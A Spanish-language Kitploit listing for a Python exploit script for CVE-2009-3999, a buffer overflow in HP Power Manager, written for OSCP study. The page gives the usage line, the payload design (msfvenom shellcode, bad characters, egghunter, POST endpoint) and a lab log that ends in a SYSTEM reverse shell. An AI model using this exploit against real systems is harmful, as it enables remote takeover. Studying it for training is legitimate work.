Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2009-3999-HP-Power-Manager-4.2-Build-7-Buffer-Overflow — Script automático escrito en Python para CVE-2009-3999 | Kitploit
Herramientas/GitHubGitHub/ac8999/cve-2009-3999-hp-power-manager-4.2-build-7-buffer-overflow
Frameworks de ExploitsGeneración de PayloadsExplotaciónShellcodePruebas de PenetraciónAprendizaje y EducaciónGeneración de ShellcodeExplotación de BinariosLabs y Práctica
GitHubac8999/cve-2009-3999-hp-power-manager-4.2-build-7-buffer-overflow

CVE-2009-3999-HP-Power-Manager-4.2-Build-7-Buffer-Overflow

Script automático escrito en Python para CVE-2009-3999

Ver Repositorio
26hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Como parte de mi preparación para el OSCP, me encontré con el exploit de desbordamiento de búfer CVE-2009-3999 (HP Power Manager 4.2 (Build 7)).

Este script actualizado resuelve problemas de compatibilidad con Python 3 en el manejo de cadenas y bytes, asegurando que el payload se transmita como binario crudo para evitar alteraciones en la memoria.

Esta versión incluye una integración automatizada de msfvenom que genera dinámicamente shellcode con los caracteres prohibidos correctos (\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c), lo adjunta a un Egghunter especializado y transmite el payload final mediante una solicitud POST al endpoint formExportDataLogs. Está diseñada para uso educativo y auditorías de seguridad, simplificando el flujo de trabajo de explotación al manejar la generación de shellcode y el inicio del listener bajo un mismo techo.

root@kitploit:~
  usage: python3 CVE-2009-3999.py <TARGET-IP> <TARGET-PORT> <LHOST> <LPORT>
  
  ┌──(venv)─(root㉿user)-[/run/…/user/2024/HTBox/kevin]
  └─# python3 exp6.py 192.168.147.45 80 192.168.45.183 4444
  [*] Generating msfvenom payload for 192.168.45.183:4444...
  [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
  [-] No arch selected, selecting arch: x86 from the payload
  Found 11 compatible encoders
  Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
  x86/shikata_ga_nai failed with Encoding failed due to a nil character
  Attempting to encode payload with 1 iterations of x86/call4_dword_xor
  x86/call4_dword_xor succeeded with size 348 (iteration=0)
  x86/call4_dword_xor chosen with final size 348
  Payload size: 348 bytes
  Final size of python file: 1953 bytes
  [+] Sending exploit to 192.168.147.45:80
  [+] Exploit sent. Starting listener on 4444...
  listening on [any] 4444 ...
  connect to [192.168.45.183] from (UNKNOWN) [192.168.147.45] 49168
  Microsoft Windows [Version 6.1.7600]
  Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
  
  C:\Windows\system32>whoami
  whoami
  nt authority\system
Descargar herramienta